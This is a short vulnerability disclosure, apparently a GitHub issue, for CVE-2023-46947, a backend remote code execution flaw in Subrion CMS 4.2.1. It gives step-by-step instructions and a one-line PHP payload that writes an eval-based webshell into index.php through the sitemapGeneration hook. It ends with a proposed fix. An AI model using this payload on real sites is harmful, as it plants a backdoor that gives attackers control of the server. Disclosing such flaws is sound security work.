Headline
CVE-2023-46947: There is a RCE vulnerability · Issue #909 · intelliants/subrion
Subrion 4.2.1 has a remote command execution vulnerability in the backend.
There is a remote command execution vulnerability****Affected version
- subrion 4.2.1 lates
login address
Find PHP info in the System module
Get the absolute path to the website in phpinfo information
Attack
Select the Hooks field in the System module
Edit sitemapGeneration in Hooks and save
Get absolute path from PHPinfo above
_SERVER[“DOCUMENT_ROOT”]=F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/
At this point we can write webshell into the website’s homepage file index.php
payload
fputs(fopen('F:/phpStudy/PHPTutorial/WWW/subrion_cms_4.2.1/index.php','a+'),'@eval($_GET[cmd]);');At this point, we can click the Generate Sitemap function to trigger code execution
The site generation function is to first write a file, and then perform a syntax check on the written PHP code. If the check passes, the code execution will be triggered.
- We are accessing the website homepage file index.php
Proposed changes
Filter dangerous functions and content in the content before writing the file
Related news
Subrion 4.2.1 has a remote command execution vulnerability in the backend.